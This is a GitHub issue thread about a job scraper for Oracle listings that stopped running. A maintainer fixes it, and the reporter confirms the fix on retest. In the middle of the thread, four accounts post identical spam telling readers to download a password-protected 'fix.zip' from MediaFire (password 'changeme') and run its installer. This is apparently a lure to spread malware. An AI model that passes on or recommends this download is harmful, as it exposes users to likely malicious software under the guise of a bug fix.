### ISSUE TITLE
Scraper for Oracle is not running properly

### ISSUE THREAD

**Issue by Lore78** [peviitor-ro/validator-ui#274]
URL: https://admin.peviitor.ro/
Browser: Chrome
Device: Laptop
OS: Windows 11

**STEPS TO REPRODUCE:**

1. Open the URL in the browser
2. Click on "Cont"
3. Click on "+" from "based_scraper_py"
4. Click on "oracle.py" and run the scraper

**EXPECTED RESULTS:**
The scraper should run without issues.

**ACTUAL RESULTS:**
The scraper does not run from August 15th, 2024 and an error pops up.

![image](https://github.com/user-attachments/assets/d01034db-d46b-4b54-aaae-6237eba477a8)

![image](https://github.com/user-attachments/assets/d24ed475-6829-4923-96e6-5affa0a8a184)

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lalalaurentiu** [comment]
Fixed..

**Comment by Lore78** [comment]
Restesting was done and it worked properly.
